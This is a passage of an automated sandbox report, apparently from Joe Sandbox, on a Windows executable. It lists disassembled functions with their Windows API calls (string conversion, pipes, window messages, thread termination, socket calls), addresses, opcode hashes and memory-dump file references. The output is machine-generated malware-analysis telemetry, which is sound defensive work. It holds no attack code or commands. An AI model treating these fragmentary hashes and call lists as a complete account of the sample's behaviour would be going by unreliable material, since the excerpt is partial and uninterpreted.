                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d4129f918cf141e38fc65374db3392735c63baad2374797cd27d85bac8b8d16f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0230b9c1c0fd9f386aa1fe28f68fe51e168b74c33f7e7eb5f612a5309aa6246a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4129f918cf141e38fc65374db3392735c63baad2374797cd27d85bac8b8d16f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54219572600219AF9F10DFA8CC88CBB77ACEF09360B44C525F90ADB290DB74DC468760
                                                                                                                                                                                                                                                                                                    Function 00A78164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A781A9
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A781CF
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00A781D2
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00A781F3
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00A781FC
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00A78216
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00A78224
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 15de8871e0f59f52699f03703e8d4e9ad1281eff7135313eaa0d048258a818f9
                                                                                                                                                                                                                                                                                                    • Instruction ID: db58af97f70e2ce66a8ef79f68c73d1a9e056a8e2c3343a39135514ca804ec09
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15de8871e0f59f52699f03703e8d4e9ad1281eff7135313eaa0d048258a818f9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5217471600105BF9B10DBF8DC89DAAB7ECEB09360B04C125F919CB1A1DB74EC42C764
                                                                                                                                                                                                                                                                                                    Function 00A80E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00A80E99
                                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A80ED5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                    • Opcode ID: d97b8a459b3832aa15b239dc29bdac30e17da898a7f306c1a292df6be76df6b8
                                                                                                                                                                                                                                                                                                    • Instruction ID: cf77d617e8bf6c5540d4bc12f4058168c3f4aa5e006ca4d68919aabb8b429852
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d97b8a459b3832aa15b239dc29bdac30e17da898a7f306c1a292df6be76df6b8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76216D7150030AAFDB60AF64DC04E9AB7A8BF55720F208A59FDE5E72E0D7709C49CB50
                                                                                                                                                                                                                                                                                                    Function 00A80F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00A80F6D
                                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A80FA8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                    • Opcode ID: af46de2c00457fbb287c002f185972702c62248cb43270424e954dd10c036816
                                                                                                                                                                                                                                                                                                    • Instruction ID: 237a428bf944840bd9837d535b9f598848f709af72db36e725a1d7e1d3aa8fe1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af46de2c00457fbb287c002f185972702c62248cb43270424e954dd10c036816
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A219071600346AFDB30AF689C04E9AB7F8BF55724F204A19F9E2E72D0D7709886DB50
                                                                                                                                                                                                                                                                                                    Function 00AA4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A178B1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: GetStockObject.GDI32(00000011), ref: 00A178C5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A178CF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AA4BB0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AA4BBD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AA4BC8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AA4BD7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AA4BE3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1854b92a0b014ad49283572335bfe1857e7cd7f3a27ebfb2334f7893db873aa3
                                                                                                                                                                                                                                                                                                    • Instruction ID: 45bb1038bec58e3168c3ece5c844f1edb31936d717a512b1d124c037b2ef9607
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1854b92a0b014ad49283572335bfe1857e7cd7f3a27ebfb2334f7893db873aa3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C1193B114021DBEEF118FA4CC85EEB7F6DEF09758F014111B618A6090CB76DC619BA0
                                                                                                                                                                                                                                                                                                    Function 00A4DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A4DB23: _free.LIBCMT ref: 00A4DB4C
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DBAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4), ref: 00A42D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: GetLastError.KERNEL32(00AE1DC4,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4,00AE1DC4), ref: 00A42D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DBB8
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DBC3
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DC17
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DC22
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DC2D
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DC38
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0c6568c99d022462d89da70faae5693571403c898fe5dab064addb7ef7231dac
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E116076941B04BADA30BBB0CE0BFCB77DCEF84700F810C29F299AA252DA75B5058751
                                                                                                                                                                                                                                                                                                    Function 00A7E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A7E328
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00A7E32F
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A7E345
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00A7E34C
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A7E390
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00A7E36D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                    • Opcode ID: 508bcc094ed5f669f0055a1d1e0465293593e1412c8121425ba3b8ebbfe22a12
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3d8a1c3cc208e8aa3dcb2f4b8d95502a81de109f6138e3bc93ddf74e6e268780
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 508bcc094ed5f669f0055a1d1e0465293593e1412c8121425ba3b8ebbfe22a12
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B0162F29002097FE751DBE48D89EEA776CDB09301F408591B78AE6481E7749E854B71
                                                                                                                                                                                                                                                                                                    Function 00A81312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00A81322
                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 00A81334
                                                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A81342
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A81350
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A8135F
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A8136F
                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00A81376
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 368305fb508f12155b4992e5ec4eec5d9f3b8cf5b9d97ddb443feb4f8323ae1b
                                                                                                                                                                                                                                                                                                    • Instruction ID: c32c8023c081f6f0cf5f9dfadb1062652944a0de0cea1c7430aa15bba1885400
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368305fb508f12155b4992e5ec4eec5d9f3b8cf5b9d97ddb443feb4f8323ae1b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F0EC32042612BBD781AB94EE49BD6FB39FF46302F401521F24295CE08B749476DF90
                                                                                                                                                                                                                                                                                                    Function 00A926BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A9281D
                                                                                                                                                                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A9283E
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A9284F
                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00A92938
                                                                                                                                                                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00A928E9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7433E: _strlen.LIBCMT ref: 00A74348
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A8F669), ref: 00A93C9D
                                                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00A92992
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 867e16ac23f089c4e36d84887704ef70ade69d2a7d17b59664df0382ad0d0906
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8515a4c2f44a266698d19cd4ce3d246a66c6bd4f3f0ddfe6c1b1d72a5aefd38a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 867e16ac23f089c4e36d84887704ef70ade69d2a7d17b59664df0382ad0d0906
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBB1E135604300AFD724DF64C885F6ABBE5AF88318F54854CF49A5B2E2DB31ED82CB91
                                                                                                                                                                                                                                                                                                    Function 00A40527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00A4042A
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A40446
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00A4045D
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4047B
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00A40492
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A404B0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 101bf1ed6dab3c5c2311173adfb0c439c77e236935f24db558592c8d9cdc7c84
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4481E879A007059BE720AF79CD42F6A77E8AFD5324F24412AF711DB681E770E9009794
                                                                                                                                                                                                                                                                                                    Function 00A46571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A38649,00A38649,?,?,?,00A467C2,00000001,00000001,8BE85006), ref: 00A465CB
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A467C2,00000001,00000001,8BE85006,?,?,?), ref: 00A46651
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A4674B
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A46758
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A36A79,?,0000015D,?,?,?,?,00A385B0,000000FF,00000000,?,?), ref: 00A43BC5
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A46761
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A46786
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
